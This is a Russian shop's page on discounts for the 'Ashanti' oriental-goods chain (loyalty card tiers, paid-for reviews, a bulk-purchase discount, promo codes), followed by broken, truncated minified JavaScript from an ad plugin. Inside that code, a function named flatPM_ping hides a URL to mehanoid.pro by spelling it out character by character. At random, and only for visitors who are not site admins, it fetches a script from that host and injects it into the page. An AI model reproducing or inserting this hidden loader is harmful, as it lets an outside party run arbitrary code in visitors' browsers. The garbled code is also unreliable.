    В данном разделе мы расскажем Вам, как очень легко и просто можно сэкономить с нами четырьмя способами:

    1. Накопительная дисконтная карта

    В сети магазинов восточных товаров «АШАНТИ КОМПАНИ» можно получить накопительную дисконтную карту , которая позволит Вам получить скидку до 5% в нашем интернет-магазине или любом розничном магазине!

    Как получить накопительную дисконутную карту?

    Просто сделайте покупку в нашем интернет-магазине или в любом из розничных магазинов более чем на 2.000 рублей . Если Вы сделали заказ через интернет, то мы приложим дисконтную карту к Вашему заказу. Если Вы сделали покупку в розничном магазине, то мы выдадим дисконтную карту сразу.

    Для получения накопительной дисконтной карты требуется заполнение анкеты!

    Как пользоваться накопительной дисконтной картой?

    При покупке в любом розничном магазине, просто передайте Вашу дисконтную карту продавцу.

    При покупке в интернет — магазине, просто введите в окне «Оформление заказа» шести-значный номер Вашей дисконтной карты (указан на лицевой части карты в левом нижнем углу). Если Вы зарегистрированы на нашем сайте, то привяжите дисконтную карту к Вашей учетной записи в разделе «Моя дисконтная карта» в личном кабинете. В этом случае скидка будет начисляться Вам автоматически при каждом интернет-заказе.

    Какие преимущества дает накопительная дисконтная карта?

    Все сделанные Вами покупки в нашем интерент-магазине или розничных магазинах суммируются .

    При сумме покупок от:

    2.000 рублей скидка — 1%

    5.000 рублей скидка — 2%

    10.000 рублей скидка — 3%

    20.000 рублей скидка — 4%

    30.000 рублей скидка — 5%

    Внимание! Скидки не суммируются!

    Многие пользователи хотят оставить о нас или нашем товаре отзывы. Мы очень благодарны Вам за это, ведь Ваше мнение о любом товаре представленном на нашем сайте поможет другим покупателям сделать правильный выбор. А чем больше таких отзывов оставляете Вы, тем большую скидку сможете получить на дальнейшие покупки в нашем магазине.

    Как можно получить баллы?

    • * Написание одного отзыва о купленной продукции на сайте без фотографиис фотографией – 30 баллов (30 рублей)60 баллов(60 рублей) ;
    • * Написание отзыва о товаре купленном у нас с упоминанием магазина восточных товаров «Ашанти» на стороннем ресурсе и ссылкой на сайт www.ashaindia.ru — 100 баллов (100 рублей);
    • * Написание отзыва о работе магазина восточных товаров «Ашанти» на стороннем ресурсе и ссылкой на сайт www.ashaindia.ru — 150 баллов (150 рублей);

    Как потратить баллы?

    Накопленные Вами баллы используются как скидка при оформлении заказа или покупке в любом из наших магазинов. Количество баллов Вы можете в любое время посмотреть в личном кабинете. Количество баллов, которые Вы хотите потратить, вводится при оформлении заказа. Если Вы хотите использовать баллы при покупке в магазине, просто сообщите продавцу четырехзначный ID вашего аккаунта (посмотреть его можно в левом верхнем углу экрана после регистрации на сайте) и продавец сделает Вам скидку на соответствующую сумму.

    Внимание!

    Баллы начисляются только зарегистрированным пользователям. Заказ можно оплатить баллами не более, чем на 50%.

    Рекомендованые сайты для размещения отзывов о товаре:

    Рекомендованные сайта для размещения отзывов о магазине:

    Как разместить отзыв?

    1. Ссылка на наш магазин, если пишите отзыв о магазине. Ссылка на продукты с нашего сайта, если пишете обзоры на продукт.

    2. 2. Для получения баллов за написанный отзыв, после его размещения Вам будет необходимо написать нам на электронную почту [email protected] c пометкой «Отзыв о Ashaindia». В письме необходимо дать ссылку на Ваш отзыв, номер заказа или номер чека и дату покупки в нашем магазине (в заказе должны содержаться товары, которые используются в отзыве).

    3. Если это был интернет-заказ, то балы будут начислены на аккаунт пользователя сделавшего заказ. Если это была покупка в магазине, то просим указать четырехзначный ID Вашего аккаунта, на который зачислить баллы.

    4. Баллы начисляются в течение 3-х рабочих дней с момента получения заявки на начисление баллов.

    5. Вы получаете бонусы только за уникальные отзывы. Данный отзыв должен быть размещен только на 1 ресурсе.

    6. Также возможно дополнительное вознаграждение от администрации за интересные, яркие и подробные отзывы с фотографиями, которые будут одобрены многими пользователями конкретного ресурса, где размещен отзыв.

    7. Может быть отказано в начислении баллов за отзыв, при этом администрация обязательно дает ответ и указывает причины, почему тот или иной отзыв не прошел проверку.

    8. Отзыв о работе магазина может быть размещен только на одном ресурсе для каждого уникального заказа (покупки). Если Вы разместите несколько похожих отзывов на разных ресурсах, их потом удалит администрация этих сайтов:(

    Мы всегда рады каждому Вашему отзыву о работе нашего магазина восточных товаров Аша или приобретенной у нас продукции. Ведь мнение нашего дорогого покупателя – главная ценность, благодаря которой мы можем развиваться, совершенствовать свою работу и становиться день ото дня только лучше! 🙂

    3. Скидка при покупке от 4.000 рублей

    И, пожалуй самый простой способ сэкономить с нами:)! Просто сделайте покупку от 4.000 рублей в любом из наших розничных магазинов и получите скидку 5% на всю покупку или сделайте заказ через интернет и получите бесплатную доставку на дом! 🙂

    Дорогие друзья! Помните, что делая покупки в сети магазинов восточных товаров «АШАНТИ КОМПАНИ» Вы не только получаете избранный и качественный товар от лучших производителей, но и экономите Ваши деньги!

    4. Как получить промо-код

    Сеть магазинов индийских товаров «Ashanti» дарит нашим постоянным покупателям дополнительные скидки. Просто укажите Ваш и-меил при оформлении заказа и, возможно, именно Вы станете обладателем промо-кода! Когда четырехзначный код придет Вам на и-меил, просто введите его в специальное поле при оформлении заказа или сообщите продавцу в магазине для получения дополнительной скидки!

    Мы свяжемся с Вами в близжайшее время

    Пожалуйста, направляйте нам любые вопросы, которые у вас возникают по e-mail:
    [email protected] или телефону +7(499)257-00-01
    Зарегистрированным пользователям доступен просмотр состояния заказа и прошлых покупок.

    Спасибо за покупки в нашем интернет-магазине!

    Самый широкий ассортимент
    среди магазинов индийских товаров

    Самые низкие цены
    в России

    Удаленность магазинов
    от метро не более 200 м.

    Доставка по всей
    Росcии

    Система скидок для
    постоянных покупателей

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};